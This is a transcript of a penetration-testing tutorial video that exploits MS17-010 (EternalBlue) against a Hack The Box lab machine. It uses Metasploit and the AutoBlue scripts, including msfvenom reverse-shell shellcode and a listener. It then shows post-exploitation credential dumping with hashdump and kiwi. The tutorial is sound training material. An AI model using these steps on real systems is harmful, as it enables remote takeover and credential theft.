[00:00:00] Hey there. You made it to episode three. Welcome back. So let's go ahead and hop right in, and we're going to go right to the Hack The Box website. And let's go ahead and spin up Blue. So we're gonna be working on Blue here, and what we're going to be doing is working on this 17-010. We're going to talk about that and its importance here in a second. First and foremost, I want you guys to spin up this machine and go ahead and go into your terminal and start scanning it. While we're scanning it, we can use our common stalling tactics and talk about the machine a little bit, and then we'll get back into the actual script. So as always, our scan looks something like this, or whatever your favorite nmap or masscan is. And then I'm going to go ahead and type in the IP address, which I have already forgotten; it is 10.10.10.40.

[00:01:00] OK, welcome everyone. Quick intro, I know. So episode 3, we are going to be covering MS17-010, a.k.a. EternalBlue. Now this is super important. It's gonna be easy. We're going... we're gonna nail this machine several different ways.
[00:01:22] We're gonna look at the Metasploit way, and some of you have been asking for manual ways, which I know why; we'll look at the manual method of doing this as well and talk about some precautions, how to check for it as well. So MS17-010 is a vulnerability that was released a couple of years ago. The SMB... I've been harping on SMB the first couple episodes; we're going to harp on SMB at least one more time here, and SMB is just so dangerous, right. And where we're at here is this: this vulnerability is a couple of years old, but it's still very significant. Now you may have heard of the WannaCry vulnerability that used MS17-010 as part of its payload in order to navigate around networks and do ransomware on networks. So very, very disgusting vulnerability, very, very costly, right. And why? Why is this critical? Well, you see this on penetration tests all the time, especially, well, definitely internals, not as much on the external side. You know, there's Shodan and other tools now that people can use to search for this, and if you still have this running on your external network, chances are you've probably been popped. But on the internal side, I see it all the time, have explained it multiple times on internal penetration tests.
[00:02:46] In fact, the latest time that I have seen it was this past week while doing an internal penetration test. So this vulnerability, while simple, is super critical. It allows us to have remote code execution and gain SYSTEM access on a machine. On top of that, it's still very, very common in networks. So the reason we're going to cover this is: one, it's common, it's critical, you're still going to see it; two, it's SMB, which goes along with the theme that we've been seeing; three, it's still an easy machine, right. We're still newbies. We're still trying to get through some of the easy stuff. We got to cover the easy stuff and the basics before we can get into anything else. So while you might be like, wow, that was easy, sometimes it is this easy. And because we not only get to play with Metasploit here, but we also get to play with AutoBlue. So we'll do it the manual way as well.

[00:03:55] OK. So if we look at this here, you can see that we have our scan back. You come through and you'll start to notice things as you see them. But when I'm looking at a machine and I see SMB, right, we've got our RPC, which is common to see with SMB, and you got a bunch of RPC ports down here.
[00:04:17] We're not going to worry about RPC today; we're worried about SMB, and we could see that it pulled back a version of Windows for us. Now it's Windows 7 Professional 7601 Service Pack 1. When I see something like this: ding ding ding ding ding, I'm thinking EternalBlue right away. OK. So that's the first thing I'm probably checking, honestly, when I see this. Now we have talked in the past, and I'm not going to cover the tools because we covered them the last two times, right. This is just kind of gradually advancing from where we've been. We could look at this with smbclient, and we could say, hey, smbclient, can I connect to 445, and can I get there, can I get the file shares? We can also run Metasploit on this and see what kind of SMB version is running. We could also scroll down to the bottom; there's always some SMB information down here, so you could see that it's Windows 7 again down here, Professional 6.1. A little bit of information. We've got a PC name.
[00:05:21] We're in a workgroup, so we're not in a domain here, and we see message signing is disabled, and then it says over here it's enabled but not required, which is pretty much the same thing as disabled because, you know, it's still a vulnerability here. So we talked about that as well. And as we get more advanced we'll cover that, but this is more Active Directory internal pen testing stuff, as I mentioned before. So, OK.

[00:05:49] We notice you've got SMB; we have in the past heard that, hey, you know, a recent exploit is called EternalBlue, MS17-010. And another thing that I should note is, when you're doing Hack The Box, a lot of times they give you a hint. OK. They give you a hint. If you notice some of these, if you look through these, like Devel, if you look through Legacy, it's even kind of a hint. Sunday's a hint, Active is a hint, and some of these, Curling, you might have to think, hey, am I having to do with curl? So, you know, there's always, I wouldn't say always, but a good amount of the time, something in the box name relates to something you're gonna have to do. So Blue probably stands out right away. That's why I'm not, like, going through the scan and saying, hey, you know, I don't know what it could be, let's enumerate this right off the bat.
[00:06:45] When you have a 17-010, you have it. OK. So we're going to do this two ways. The first way we're going to do is the auto-pwn method. So let's go with msfconsole, and let's talk about a couple things here. Once we load this up, say we're doing a real pen test. First things first, we want to confirm that we think it is EternalBlue. We want to make sure that we can see that. So what we can say is, we can say search MS17-010, something like that. And there is this auxiliary scanner here, right. We just want to know, does EternalBlue exist? Do we think it exists? So that's important first, right. You don't just want to fire an exploit without confirming, or at least having a good hunch, that this exists. Also, it should be noted too that I screwed that up: SMB MS17-010. It should also be noted that this exploit can tip a machine over. So if you're doing it on an internal environment, make sure that it's not a significant machine. Like, if this was a domain controller, you'll probably want to call up, you know, the client and say, hey, I'm about to use an exploit, can I use this? It may tip your machine over. Are you ready in case that happens?
[00:08:12] You know, if this is just like a workstation, it's iffy. They kind of maybe expect you being in there, but still, you don't know who's working on what. And it would suck to lose all your work as well. So best practice might be just to call all the time. So we could say options here, and then all we have to do is set an RHOST. So the RHOST that we're going to set is 10.10.10.40, and then we'll say options, and everything else looks like it is set. So it's going to check for named pipes here in this exploit. That's kind of how it works. Now this is complicated, more and more over my head than I'll ever be able to fully understand. But it has to be able to find a named pipe in order to actually exploit. So let's go ahead and just run this check here, and you'll get this. It'll say host is likely vulnerable to MS17-010, and it pulls back a 64-bit. Perfect. OK.

[00:09:15] So if we scroll back up a tiny bit, there are a few different ones. There is MS17-010 EternalBlue. There is a psexec version, and there is Windows 8 here. So this is for... what is it? It's for Windows 7. And I forget the other operating system.
[00:09:38] You can run these on Windows 10 and other servers; this is a Server 2008, 2012, I don't remember which one it is. But you know, it's always worth checking, especially nowadays if you're running something like Nessus; Nessus is going to pull up and say, hey, we found EternalBlue, at least we think we do. Especially like on an internal assessment. But if you don't have those sorts of tools available to you, you could do this sort of check here. So let's go ahead and just say use, and then I'm just gonna paste what I just copied there. Sorry, I'm clumsy; if you guys hear some shaking, I keep hitting my microphone. OK. Options. And again, all we've got to do is set the RHOST for this. So this says 2008 R2 and Windows 7. I've used it on other machines, I've used it on Windows 10 before, it's worked. OK. So now we are good, and we can use show targets, like I've said in the past; all there is is one target here. So let's run it. Now this exploit doesn't always work on the first try. It's kind of a finicky exploit. So we'll let it run here and see if it actually works, and it's worked first time. Awesome. Great.
[00:11:01] So you see we got the WIN, and then might just have to hit enter here, and we are on the system. OK. So we have a command shell. We could say whoami, and we are NT AUTHORITY\SYSTEM on the hostname of haris-PC. Not bad. This is pretty good. We can improve this, I believe. So let's go ahead and hit... yes, abort session. Control-C and then abort the session; we'll close the shell. Let's take a look at options again. Now you could see that we used a generic reverse shell here; see the payload generic/shell_reverse_tcp. Now this is what we consider an unstaged payload; a staged payload would have a forward slash here, meaning that it sends this payload in stages, right. So it would say, hey, stage one, stage two, stage three. But because we have the underscore rather than the forward slash here, we can identify this as an unstaged payload, meaning that it sends it all at once. So there's different pros and cons to both. My recommendation is always, if you're having trouble getting a shell and you're pretty sure that there's an exploit available, consider changing this to a staged payload here. And I'm sure we're going to encounter that as we go further.
[00:12:21] But I can show you the differences here as well. So we can say something like set payload; what I want here is, I am a Windows fanboy, right. And this is going to be auto-tab. So windows/x64, and I said Windows, and I'm a Meterpreter fanboy, so we can say meterpreter, if it's available; it is, OK. And then we just say meterpreter, and this is staged, right, look at the stages, and then reverse_tcp. This is the one we're gonna want. So let's go ahead and select that first. And what we're doing here is we're improving our payload. So we're going from this generic shell, and you saw it brought us into a command prompt. That's OK, but we could do better. So we're going to set this payload here. Now if we went back and we just said set payload and we did windows/x64 and double-tabbed, you can see there's other stuff besides meterpreter, and here they have a shell; say, look at this bind_tcp, or look at this reverse_tcp, forward slash here. This is a staged payload. Look at this one here. This is unstaged. So this sends in multiple stages. This kind of sends all at once. OK. So it's always good to try both.
[00:13:41] And if you're struggling, say, with Meterpreter in general, going to a generic reverse TCP like this is always a good option as well, just to try out different payloads and make sure that you're not losing your mind attacking with the right exploit but not having the right payload. So payloads are important as well. So we already have our payload selected. Let's go ahead and say options, and you could see it picks for us our LHOST. That's correct. And our LPORT. That is correct. That's fine. We're gonna go ahead and say run now, or you could type in exploit if you want to be cool. You can see the payload option changed up here from the generic as well. So good to note. So we'll let this ride and see if it works; it's possible that it doesn't work with this Meterpreter. It could be too much for it. Maybe that's why we're using generic, but hopefully we can improve this shell here.

[00:14:40] And while we're waiting on this, what we can do is we can go out to the interwebs, and we can hit the plus area, get a new tab going. So what we're going to look for is a tool called AutoBlue, and we'll just type in GitHub. There it is, perfect, Google already knows what we want: AutoBlue MS17-010. So we're going to try this here, and if we go to the GitHub, we read through it.
[00:15:11] It tells you what it is. So it has a Python EternalBlue checker here, so it'll tell us, hey, does this work or not work. This will also come down, and it will allow us to compile shellcode similar to what we're doing; shellcode will just be the payload that we're using. It'll allow us to compile that and set up a listener with Meterpreter, and then we can just post it. It'll all make sense here in a minute. It's just a little bit more of a manual method. And this one is actually pretty good. The one in the past, when EternalBlue first came out, was like, it was a little bit more hands on, a little bit more detailed. This one has made it way more comfortable to use and user friendly. So my advice is, if you're looking for an alternative to Meterpreter, and this is still going to use Meterpreter, though you do not have to. You can see in here it's going to say 0 for Meterpreter shell, 1 for regular command shell. I always like the Meterpreter shell just because you get extra; I understand there are situations, certain exams, where you can't. In that instance, I think it's best still to practice with this and practice the other way as well, and just get comfortable with both. But if I had the choice on a real world assessment, I'm always using Meterpreter because of the flexibility. OK, so let's go back here.
[00:16:31] You see that we've got a shell. This is perfect. It failed the first time; I told you guys it might fail. That happens, but we've got a win here. Same thing, if you getuid, we are NT AUTHORITY\SYSTEM; sysinfo here. OK. We've got a Meterpreter 64-bit and architecture 64-bit, wonderful. That's all right. Right. Remember from the previous episodes, first things first, why not dump some hashes, right. So now we can take these hashes, and we can try to pass them around the network. We can try to, you know, crack them as well with hashcat or John or whatever, and see if this gets us a foothold anywhere else in our network. We can also dive into the machine and look for valuable information; we can look at the routing table. You know, we can go into a shell, and we can say, like, route print. OK. What other networks does this talk to, you know, and is this going to talk to anything? It's not really the best example because there's no dual-homed machines that I know of, at least in Hack The Box. So 10.10.10.2 is its gateway; we can look at that.
[00:17:43] We can look at arp -a and see what's in the ARP table and what machines it talks to; it's only going to talk to itself. netstat -an, you know. So if you're not familiar with these commands, again, I know I mentioned them before, but it's important to learn some of these common networking commands. And what we're trying to do with netstat, that's going to show what ports are open and what ports we're talking to. You can see that we have a CLOSE_WAIT on our last shell here, and then we opened up a new port. And this is us communicating here on PID 1068, and we can come back, if you're curious about how that works; if we look for 1068, OK, this is apparently what we came in on, this spoolsv. You can kind of look around and gain some information about, you know, the forensic side of things as well. I'm no good at forensics, but it's always interesting to look at these PPIDs and the PIDs, see the parent and the PID, to see, you know, like OK, where did we come in, and do we see any kind of information here. This is also good for migration, which we'll talk about at a later time when we have to do it. As of now we haven't had to migrate; that's a little bit of a later lesson. So we've gathered hashes, we can gather network information. We can go look at files in the file system.
[00:19:11] Of course, you know, you can go and dump your hashes; so your hashes are gonna be in the Administrator folder for the root hash and the user folder for the user hash, and I won't try to do that; I've shown you that a couple of times now. So this is the method for the automated Metasploit, and we can also say, like, there's load commands, so I'm not sure if I've shown you guys these before, but we can load something like kiwi, and kiwi will... we can say help, and we could do, like, a creds_all, and try to dump all the credentials that we can. Nothing came back here. That's OK, but it's cool; we can dump Kerberos, we can dump the WDigest, and you won't have to know what any of this is right now. Just know that we have a lot of power with Meterpreter. We can dump the Wi-Fi list, the Wi-Fi shared list here; we can change passwords; can dump the SAM, right. We'd say lsa_dump_sam. OK. There's the SAM that we just saw with the hashdump. We could dump secrets, right. So there is a lot going on here. You know, Incognito is another great tool, but I'm not going to get into it. But we can look at, for example, we can say list_tokens -u for users, and then we can impersonate a user if there's one of value here; way advanced topic.
[00:20:40] I'm just trying to show you the flexibility that we have here and really hammer down that, like, Meterpreter is very, very flexible. On top of that, which we're not going to get into today either, Meterpreter has a bunch of post exploitation commands, and you're going to see one in an upcoming video on running a post exploit suggester. So when we get to that, you'll get to see the post commands and how they work as well. So we'll focus on those at a later time.

[00:21:10] So let's go ahead, and I'm going to exit out of all of this, and I'm going to exit here too, and let's go download this GitHub repository here, so we click on this clone or download and just copy this link. We can go back in, and what I want to do is I'm going to change directory to my /opt folder; that's where I like to put my files or my programs. And if you don't have git, I don't know if it comes preinstalled, apt install git, like that, will get you what we're about to use. So git clone, and then we're gonna paste this in here, and then we are going to cd into AutoBlue and ls, and it looks like it's all ready for us. So if we go back into the instructions, come down here, now it's got the EternalBlue checker .py, and if we look, we've got the EternalBlue checker right here. So let's run Python against that, and we'll just say 10.10.10.40, similar to the instructions that told us to run it with an IP address; hit enter, and it says the target is not patched.
[00:22:31] OK, so that means that it's likely vulnerable. This is telling us, this is another way, when I want to use something on an assessment to prove, say that I ran the exploit, the exploit is not working, but I have a good feeling that the exploit is there, the vulnerability is there. There are times where MS17 is there, you cannot exploit it without a valid user. There's times where you have no pipes. This, as it says, is testing the named pipes. There are more pipes than this, and that's what Metasploit found. But there are times where you have to have a user, a user of any kind, doesn't have to be an admin, but just a user of any kind. And it will allow us to get a shell on this machine. So this is good. This is another way to check; you saw how to check with Metasploit. Now you can see how to check with this tool as well.

[00:23:21] And what we can do here is we can follow the instructions now on how to actually generate this. So we're going to navigate to the shellcode folder. We're going to generate some shellcode, and all this is is the payload, right. The payloads that you were seeing just a minute ago, the Meterpreter payload, the generic payloads; all we're doing is generating this a little bit manually. This is actually going to do it for us, which is super nice, super friendly.
359 00:23:46,600 --> 00:23:56,530 So we're going to run the shell_prep.sh, and it's going to say, do you want to generate a reverse shell 360 00:23:56,530 --> 00:23:57,890 with msfvenom? 361 00:23:57,910 --> 00:23:58,910 We'll say yeah, why not. 362 00:23:59,770 --> 00:24:01,150 And then what's our LHOST? 363 00:24:01,210 --> 00:24:01,780 That's us. 364 00:24:01,780 --> 00:24:03,070 What's the listening host? 365 00:24:03,520 --> 00:24:06,380 So let's go to a new tab and I'll blow this up. 366 00:24:06,410 --> 00:24:14,010 We'll say ifconfig, or ip a if you like the new version of doing it. 10.10.14.24 367 00:24:14,030 --> 00:24:15,250 for me. 368 00:24:17,350 --> 00:24:18,250 OK. 369 00:24:18,560 --> 00:24:20,390 What's the port you wanna listen on? 370 00:24:20,390 --> 00:24:22,990 We'll say 4445, 371 00:24:23,210 --> 00:24:28,340 just to be different, and then for x86 we need a different one. 372 00:24:28,490 --> 00:24:30,350 Not that this is gonna be x86. 373 00:24:30,350 --> 00:24:33,630 We already know it's x64, but that's fine. 374 00:24:33,650 --> 00:24:37,580 So now, do we want to generate a Meterpreter shell or do we want to generate a regular command shell? 375 00:24:37,610 --> 00:24:43,370 If we're going completely manual we'll generate a command shell, but just for simplicity's sake I'm going 376 00:24:43,370 --> 00:24:49,410 to generate a Meterpreter shell. And do we want it to be staged or stageless? 377 00:24:49,520 --> 00:24:55,100 We'll try with staged first, and if not we'll try with stageless afterwards. But we tried a staged payload 378 00:24:55,130 --> 00:24:57,370 and it worked so well. 379 00:24:57,410 --> 00:24:59,660 We'll do that again here and see if we can get it to work. 380 00:25:00,320 --> 00:25:05,030 And you can see the commands it's running, so it's running msfvenom, which is a payload generator.
381 00:25:05,120 --> 00:25:08,600 We're going to get into that in a later episode as well, on how to generate payloads. 382 00:25:08,600 --> 00:25:13,310 Actually, I think the next episode's going to cover that. And you can see it's just generating a payload 383 00:25:13,310 --> 00:25:14,600 for the x64. 384 00:25:14,600 --> 00:25:19,700 You see the 64 bin here that it has, and it's generating one for the x86 as well. 385 00:25:19,700 --> 00:25:23,180 So 64-bit and 32-bit, different ports. 386 00:25:23,180 --> 00:25:25,210 Same kind of idea. 387 00:25:25,390 --> 00:25:26,770 It's just doing everything for us. 388 00:25:26,780 --> 00:25:30,240 We could do this ourselves if we wanted to. 389 00:25:30,240 --> 00:25:30,510 All right. 390 00:25:30,810 --> 00:25:39,130 So coming through here, now it says we need to do a run listener, or the run listener prep, so we go back 391 00:25:39,130 --> 00:25:44,250 a directory. Let's make sure we're in the right directory. OK. 392 00:25:44,270 --> 00:25:47,330 We're going to do listener_prep.sh. 393 00:25:47,330 --> 00:25:49,520 Now we've got to generate a listener. 394 00:25:49,520 --> 00:25:51,840 So again we need our LHOST. 395 00:25:52,310 --> 00:25:55,380 I believe I'm at .26 or .24. .24. 396 00:25:55,430 --> 00:25:58,560 I used to be .26. OK. 397 00:25:58,580 --> 00:26:04,950 And we said 4445, 4446, 0 and 0. 398 00:26:05,210 --> 00:26:09,670 So what this is doing is this is going to start Metasploit. Metasploit has something called an exploit 399 00:26:09,680 --> 00:26:19,130 handler, and I will be showing you guys that as well, so we can use the exploit handler to set up a listener. 400 00:26:19,130 --> 00:26:25,730 So we're listening here in the background for any connections that come through on our IP address at 401 00:26:25,730 --> 00:26:29,960 4445 or 4446. 402 00:26:29,960 --> 00:26:31,330 And that's all.
403 00:26:31,580 --> 00:26:33,860 So it has to know the payload that you use. 404 00:26:33,860 --> 00:26:39,850 So we're actually using a windows/x64/meterpreter/reverse_tcp payload. 405 00:26:40,010 --> 00:26:46,510 So the payload that we generated, which you saw we generated earlier, the msfvenom payload, 406 00:26:46,580 --> 00:26:49,970 this payload here has got to match the listener. 407 00:26:50,180 --> 00:26:52,010 So the listener is defining the payload. 408 00:26:52,040 --> 00:26:55,770 And that's why it's asking these questions: hey, do you want to set up a Meterpreter listener? 409 00:26:55,790 --> 00:26:58,700 Do you want it to be staged or stageless? 410 00:26:58,700 --> 00:27:00,980 Do you want it to be 64-bit, blah blah blah. 411 00:27:01,010 --> 00:27:02,260 So it's doing that. 412 00:27:02,450 --> 00:27:08,030 And it set us up, and then you see it set us up here with a 64-bit payload, and it's just handling 413 00:27:08,030 --> 00:27:09,760 this for us. 414 00:27:09,770 --> 00:27:12,860 So now you've got the multi handler running. 415 00:27:12,860 --> 00:27:16,430 I've got a new tab already opened up, so you guys can open up a new tab as well. 416 00:27:16,850 --> 00:27:19,550 Let's scroll down to the pwn down here. 417 00:27:19,550 --> 00:27:24,590 So this has been tested on Windows 7, Server 2008 and Windows 10. 418 00:27:24,620 --> 00:27:28,380 It should work on Windows 8 and Server 2012 as well. 419 00:27:29,030 --> 00:27:32,950 So we say cd dot dot, 420 00:27:33,060 --> 00:27:35,220 back to our main folder. 421 00:27:35,280 --> 00:27:41,250 Now what we need to do is we need to say eternalblue_exploit7.py is what it looks like. 422 00:27:41,250 --> 00:27:46,860 So we'll say python eternalblue_exploit7.py. 423 00:27:46,860 --> 00:27:48,020 All right. 424 00:27:48,270 --> 00:27:52,990 We need the target IP, which we know is 10.10.10.40. 425 00:27:53,280 --> 00:27:55,530 We need the path to the shellcode,
426 00:27:55,540 --> 00:27:59,480 sc_all.bin, which is just going to be shellcode here, 427 00:27:59,570 --> 00:28:00,880 sc_all.bin. 428 00:28:00,900 --> 00:28:05,210 That's what it generated for us, and then the number of groom connections. 429 00:28:05,210 --> 00:28:07,580 Now I don't know exactly what the groom connections are. 430 00:28:07,580 --> 00:28:09,740 I know that it's super important. 431 00:28:09,740 --> 00:28:14,300 I think it starts with 12 or 13, and then we can set it manually if we're having issues, but let's go 432 00:28:14,300 --> 00:28:19,030 ahead and just leave that blank. 433 00:28:19,160 --> 00:28:19,470 OK. 434 00:28:19,470 --> 00:28:27,330 So it fired off and it looks like we got a session. So we could type in sessions now, and you could see 435 00:28:27,330 --> 00:28:32,880 that we've got authority system on session one. So we just type in sessions 1 and we've interacted. 436 00:28:32,880 --> 00:28:33,900 Same thing. 437 00:28:33,900 --> 00:28:35,140 getuid. 438 00:28:35,820 --> 00:28:37,800 whoami or hostname. 439 00:28:37,830 --> 00:28:39,980 It doesn't know hostname. 440 00:28:39,990 --> 00:28:40,830 That's OK. 441 00:28:40,900 --> 00:28:42,110 Use sysinfo. 442 00:28:42,450 --> 00:28:45,920 And that's where you get your hostname. So that's it. 443 00:28:45,990 --> 00:28:48,380 That's really it, like, from here. 444 00:28:48,390 --> 00:28:51,770 We took an easy exploit, but we learned several things today, right? 445 00:28:51,930 --> 00:28:54,720 We learned that we can do the exploit manually. 446 00:28:54,720 --> 00:28:57,360 We can also use Metasploit to do it. 447 00:28:57,360 --> 00:28:59,660 We learned about different types of payloads. 448 00:28:59,670 --> 00:29:01,610 There are staged versus stageless.
449 00:29:01,620 --> 00:29:07,500 Now I encourage you to go read up on what the benefits are of both and what the differences are, but you 450 00:29:07,500 --> 00:29:15,390 should know that they exist, and you should know that, you know, the alternative might be an option, or 451 00:29:15,390 --> 00:29:21,570 even a generic payload might be an option, that if you're sure or unsure, maybe try changing your payload 452 00:29:21,600 --> 00:29:27,720 before giving up completely on an exploit. And we learned a little bit about msfvenom; we're going to 453 00:29:27,720 --> 00:29:30,060 learn more about that in the next video. 454 00:29:30,200 --> 00:29:33,200 We learned about some load commands from Meterpreter. 455 00:29:33,260 --> 00:29:37,010 You know, again, how to dump hashes, some important network commands. 456 00:29:37,070 --> 00:29:41,390 So really another SMB exploit that we can just take and build upon. 457 00:29:41,480 --> 00:29:47,570 And that's all we're after. We're just going to continue building on these exploits and get better, hopefully. 458 00:29:47,600 --> 00:29:52,160 So this is the end of episode three, and that's all I got for you. 459 00:29:52,190 --> 00:29:56,360 So until the next episode, I am TCM, and I thank you for joining me.